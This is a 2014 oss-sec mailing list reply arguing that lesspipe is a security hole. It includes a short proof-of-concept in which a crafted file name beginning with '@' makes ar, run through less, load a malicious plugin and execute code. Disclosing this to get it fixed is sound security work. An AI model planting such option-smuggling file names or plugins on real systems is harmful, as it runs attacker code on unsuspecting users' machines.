oss-sec mailing list archives
Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument)
From: Alexander Cherepanov <cherepan () mccme ru>
Date: Thu, 11 Dec 2014 03:08:42 +0300
On 2014-11-23 12:24, Michal Zalewski wrote:
In short, many Linux distributions ship with the 'less' command automagically interfaced to 'lesspipe'-type scripts, usually invoked via LESSOPEN. This is certainly the case for CentOS and Ubuntu. Unfortunately, many of these scripts appear to call a rather large number of third-party tools that likely have not been designed with malicious inputs in mind. On CentOS, lesspipe appears to include things such as groff + troff + grotty, man, and cpio. On Ubuntu, there's isoinfo (?!), ar from binutils, and so on. Ancient and obscure compression utilities and doc converters crop up, too.
Yeah, it also leads to funny collisions in command line parsing.Let's consider `ar` again. If it meets an option starting with '@' it treats the rest of the option as a file name to read additional options from. This can be dangerous but the user is supposed to read help/man and not to run command like `ar tv @file` or `readelf -x *` in an untrusted directory (all utilities from binutils seems to have this feature).
Then `less` enters the game. I don't see anything in --help/man for `less` which hints that '@' is a dangerous char to be in file names. Ok, let's see how it can be combined:
----------------------------------------------------------------------
# imagine that we work in an untrusted dir (unpacked archive or
# something) and the dir contains the following files
printf '#include <stdio.h>\nvoid onload(void *v) { puts("Pwned"); }' | \
gcc -fPIC -shared -o plugin.so -xc -
ar rc ./@.a /dev/null
echo '-s --plugin ./plugin.so ./@.a' > .a
# pretend that our distro activated lesspipe and finally run `less`
(eval "$(lesspipe)"; less @.a)
----------------------------------------------------------------------
You should see "Pwned" inside `less`.
IMHO it crosses security boundary and should be considered a vuln in
lesspipe. It neither validates file names nor documents the dangerous
ones. It also perfectly illustrate how fragile this construction is.
-- Alexander Cherepanov
Current thread:
- so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Michal Zalewski (Nov 23)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Hanno Böck (Nov 23)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Bernhard Hermann (Nov 23)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Alexander Cherepanov (Dec 11)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Alexander Cherepanov (Nov 23)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Lionel Debroux (Nov 23)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Michael Samuel (Nov 23)
- CVE request: cpio heap-based buffer overflow [was Re: [oss-security] so, can we do something about lesspipe? (+ a cpio bug to back up the argument)] Murray McAllister (Nov 24)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Alexander Cherepanov (Dec 11)
- Re: so, can we do something about lesspipe? (+ a cpio bug to back up the argument) Hanno Böck (Nov 23)